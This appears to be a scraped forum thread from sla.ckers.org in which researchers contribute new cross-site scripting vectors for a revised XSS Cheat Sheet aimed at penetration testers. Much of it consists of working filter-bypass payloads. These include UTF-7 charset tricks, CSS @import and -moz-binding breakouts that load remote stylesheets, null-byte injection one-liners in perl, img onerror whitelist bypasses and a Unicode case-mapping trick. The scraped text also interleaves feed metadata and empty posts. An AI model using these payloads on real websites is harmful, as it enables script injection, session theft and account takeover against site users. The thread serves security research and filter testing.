New Version of the XSS Cheat Sheet Hey guys - sorry I haven't posted in a while. Busy busy busy. But I'm here to solicit your help! I finally got around to re-testing all of the old vectors, updating them and writing it all up for the next revision of the XSS Cheat Sheet. What I haven't done is add new vectors in yet. So this is your chance if you have known about something for years, want it on the page and want credit for having found it. If you do want to update the cheat sheet with something here's the deal: 1) It must work in one of the browsers listed 2) It must work _without_ user interaction - onmouseover is great and all but it's terrible for demonstration purposes. 3) It must fire a popup with text at a minimum - alert(1) is fine for some things but in reality it must at least pop text to prove that it works for the folks who use this for pen-testing. 4) It must be _significantly_ different from all current vectors listed - by significantly I mean it can't replace a char or two. It's gotta actually be different. 5) It must be a way to bypass filters - not just a JavaScript obfuscation technique - although it might be worthwhile to have one JavaScript obfuscation technique in there (the best/most important) and point back to tra.ckers or the thread on sla.ckers for the rest, since it's really it's own thing. The goal of the XSS Cheat Sheet was never to make a completely exhaustive list - but rather to bring together unique filters to get people thinking about all the possibilities. It's a cheat-sheet after all! Here's a link to the new page (it will eventually replace the old page and/or I may keep the old page as a revision for posterity): http://ha.ckers.org/xss2.html So fire away with new vectors only. Oh yeah, and if you paste something here that's identical to something that's already been on the page for three or four years now, I'm going to put a doorknob in a sock and beat you with it. Control-F isn't that hard. http://sla.ckers.org/forum/read.php?2,29779,29779#msg-29779 Wed, 22 May 2013 08:22:31 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?2,29779,34534#msg-34534 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34534#msg-34534 
    onafterprint
    onbeforeprint
    onbeforeunload
    onemptied
    ondurationchange
    onhashchange
    onmessage
    onoffline
    ononline
    onpagehide
    onplaying
    onpageshow
    oncanplay
    onpopstate
    onratechange
    onredo
    onresize
    onreset
    onstorage
    onseeking
    onsuspend
    onstalled
    onundo
    onunload
    onwebkitanimationiteration
    onwebkittransitionend
]]> Skyphire XSS Info Sat, 22 May 2010 07:44:16 -0500 http://sla.ckers.org/forum/read.php?2,29779,34533#msg-34533 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34533#msg-34533 onhashchange="event"
hehe.


Provided code by whatwg: 


<!DOCTYPE HTML>
<html>
 <head>
  <title>onhashchange</title>
 </head>
 <body onload="update()" onhashchange="update()">
  <h1>onhashchange</h1>

  <p><a href="#a">AAAA</a> <a href="#b">BBBB</a></p>

  <p id=message>...</p>

  <script>

   function update() {
     if (location.hash) {
       var msg = location.hash.substr(1);
       document.getElementById('message').firstChild.data = msg;
     }
   }

  </script>

 </body>
</html>
]]> Skyphire XSS Info Sat, 22 May 2010 07:20:37 -0500 http://sla.ckers.org/forum/read.php?2,29779,34527#msg-34527 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34527#msg-34527 Anonymous User XSS Info Fri, 21 May 2010 17:03:26 -0500 http://sla.ckers.org/forum/read.php?2,29779,34520#msg-34520 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34520#msg-34520 oninput=""
Browser test page: http://jsbin.com/efalu/7]]> Skyphire XSS Info Fri, 21 May 2010 10:56:57 -0500 http://sla.ckers.org/forum/read.php?2,29779,34362#msg-34362 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34362#msg-34362
http://heideri.ch/jso/

No SEO, no jizz nor goo - just an attempt to create a place where this madness is being collected to be freely available for whatever you need it. Scanners, your own internal cheat sheet, ... up to you. You got a contribution? Ping me or one of the other project owners:

http://code.google.com/p/html5security/

More vectors coming tomorrow.]]> Anonymous User XSS Info Fri, 30 Apr 2010 16:32:39 -0500 http://sla.ckers.org/forum/read.php?2,29779,34331#msg-34331 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34331#msg-34331 Skyphire XSS Info Tue, 27 Apr 2010 17:56:48 -0500 http://sla.ckers.org/forum/read.php?2,29779,34321#msg-34321 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34321#msg-34321 Anonymous User XSS Info Tue, 27 Apr 2010 08:20:25 -0500 http://sla.ckers.org/forum/read.php?2,29779,34319#msg-34319 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34319#msg-34319
Why onfocus & onblur? or the other list of inline events and style for that matter? they are already known right?]]> Skyphire XSS Info Tue, 27 Apr 2010 08:04:02 -0500 http://sla.ckers.org/forum/read.php?2,29779,34314#msg-34314 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34314#msg-34314
Sweeeeeeet]]> Gareth Heyes XSS Info Mon, 26 Apr 2010 15:20:21 -0500 http://sla.ckers.org/forum/read.php?2,29779,34313#msg-34313 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34313#msg-34313
http://code.google.com/p/html5security/

http://code.google.com/p/html5security/source/browse/#svn/trunk]]> Anonymous User XSS Info Mon, 26 Apr 2010 14:09:35 -0500 http://sla.ckers.org/forum/read.php?2,29779,34256#msg-34256 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34256#msg-34256 Gareth Heyes XSS Info Thu, 22 Apr 2010 17:49:48 -0500 http://sla.ckers.org/forum/read.php?2,29779,34255#msg-34255 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,34255#msg-34255 
<meta charset="x-imap4-modified-utf7"&&>&&<script&&>alert(1)&&;&&<&&/script&&>
]]> Anonymous User XSS Info Thu, 22 Apr 2010 16:16:18 -0500 http://sla.ckers.org/forum/read.php?2,29779,33886#msg-33886 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33886#msg-33886 
<style>@import'vb\script:alert(1)</style>
]]> Anonymous User XSS Info Wed, 17 Mar 2010 15:42:47 -0500 http://sla.ckers.org/forum/read.php?2,29779,33851#msg-33851 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33851#msg-33851 Kyo XSS Info Mon, 15 Mar 2010 06:31:44 -0500 http://sla.ckers.org/forum/read.php?2,29779,33849#msg-33849 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33849#msg-33849
Nice idea that actually, but any good whitelist will either drop the src or rewrite it. Still nice vector though]]> Gareth Heyes XSS Info Mon, 15 Mar 2010 04:48:12 -0500 http://sla.ckers.org/forum/read.php?2,29779,33848#msg-33848 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33848#msg-33848
whitelist bypassing;


<img src= alt=" onerror=alert(1)//">]]> Kyo XSS Info Mon, 15 Mar 2010 04:20:34 -0500 http://sla.ckers.org/forum/read.php?2,29779,33705#msg-33705 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33705#msg-33705
<sarcasm>I'm sorry your vectors contain a single quote this is already on the cheatsheet, we don't include vectors that can be made using elements of previous vectors.......</sarcasm>


<praise>
Nice vectors! I like your CSS break out
</praise>]]> Gareth Heyes XSS Info Thu, 04 Mar 2010 02:50:51 -0600 http://sla.ckers.org/forum/read.php?2,29779,33701#msg-33701 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,33701#msg-33701
1.
Quote
ha.ckers.org/xss2.html
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">

The power of this vector is still not fully identified and it generates questions. This should be replaced by 
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="alert('XSS')">
or better 
<P STYLE="behavior:url('#default#time2')" onBegin="alert('XSS')">
.

I already wrote about this.

2.
Quote
ha.ckers.org/xss2.html

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@im\port'ht\tp://ha.c\kers.org/xss-retest.css';</STYLE>

Need to add: 

<STYLE>a{background:url('s1' 's2)}@import javascript:alert(1);');}</STYLE>
// IE 6


or better 

<STYLE>a{background:url('s1' 's2)}@import url(http://ha.ckers.org/xss.css);');}</STYLE>
// IE 6-8 (breaking out of css-string + rules after something)


to your taste...

3.
Quote
ha.ckers.org/xss2.html
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

It should be replaced: 

<STYLE>BODY{property:"
invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);"}</STYLE>
//FF 3.6 + breaking out of css-string


or better 

<body style="property:'&#10invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);'">


4.
Quote
ha.ckers.org/xss2.html
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
// IE (in tag) 

perl -e 'print "<IMG SRC=\"\" o\0nerror=alert(\"XSS\")>";' > out
// IE (in attribute)

Need to add: 

perl -e 'print "<IMG\0zzz SRC=\"\" onerror\0zzz=alert(\"XSS\")>";' > out
// GC 4 & Safari 4.0.4 (right side (after \0) in the tagname and attribute is ignored, but left side is valid)


And the logical conclusion: 

perl -e 'print "<IMG STYLE=xss:expr/\0*XSS*\0/ession(alert(\"XSS\"))>";' > out
// IE (in parameter, bypass filtering comments). This comment is also valid in GC & Safari, if stylesheet into "<style>".



@all, the show must go on!!!


P.S.
Quote
rsnake
Posted by: rsnake
Date: August 10, 2009

Quote
ha.ckers.org/xss2.html
Check back in a week or two!

:D:D:D


upd1: @Gareth, nice! haha :)) Yep, <imitation>I'll do my own</imitation>


LeverOne]]> LeverOne XSS Info Thu, 04 Mar 2010 01:41:23 -0600 http://sla.ckers.org/forum/read.php?2,29779,30374#msg-30374 n http://sla.ckers.org/forum/read.php?2,29779,30374#msg-30374 Anonymous User XSS Info Mon, 07 Sep 2009 05:20:29 -0500 http://sla.ckers.org/forum/read.php?2,29779,29921#msg-29921 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29921#msg-29921
<&#383;cript>

changes to <SCRIPT> when:

"\u017fcript".toUpperCase()

unicode for the win!

credit goes to chris weber that guy rocks..]]> sirdarckcat XSS Info Sun, 16 Aug 2009 21:54:18 -0500 http://sla.ckers.org/forum/read.php?2,29779,29903#msg-29903 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29903#msg-29903

dross and jeremiah are also CISSP iirc heh]]> sirdarckcat XSS Info Sat, 15 Aug 2009 23:07:36 -0500 http://sla.ckers.org/forum/read.php?2,29779,29900#msg-29900 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29900#msg-29900 nEUrOO XSS Info Sat, 15 Aug 2009 17:52:00 -0500 http://sla.ckers.org/forum/read.php?2,29779,29899#msg-29899 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29899#msg-29899 Gareth Heyes XSS Info Sat, 15 Aug 2009 17:28:00 -0500 http://sla.ckers.org/forum/read.php?2,29779,29898#msg-29898 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29898#msg-29898 nEUrOO XSS Info Sat, 15 Aug 2009 16:28:30 -0500 http://sla.ckers.org/forum/read.php?2,29779,29895#msg-29895 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29895#msg-29895
hahahahahahhahhaahaha you kept that quiet
**Pointing and laughing**]]> Gareth Heyes XSS Info Sat, 15 Aug 2009 15:13:53 -0500 http://sla.ckers.org/forum/read.php?2,29779,29890#msg-29890 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29890#msg-29890 thornmaker XSS Info Sat, 15 Aug 2009 14:43:39 -0500 http://sla.ckers.org/forum/read.php?2,29779,29887#msg-29887 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29887#msg-29887 >
> the cheatsheet would still be used by.. well..
> CISSPs, and tra.ckers by us :)

I don't wanna spoil anything, but thornmaker is CISSP'd :P]]> nEUrOO XSS Info Sat, 15 Aug 2009 12:57:03 -0500 http://sla.ckers.org/forum/read.php?2,29779,29882#msg-29882 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29882#msg-29882 Anonymous User XSS Info Sat, 15 Aug 2009 10:27:55 -0500 http://sla.ckers.org/forum/read.php?2,29779,29880#msg-29880 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29880#msg-29880 rvdh XSS Info Sat, 15 Aug 2009 10:19:23 -0500 http://sla.ckers.org/forum/read.php?2,29779,29879#msg-29879 Re: New Version of the XSS Cheat Sheet http://sla.ckers.org/forum/read.php?2,29779,29879#msg-29879 Anonymous User XSS Info Sat, 15 Aug 2009 10:07:28 -0500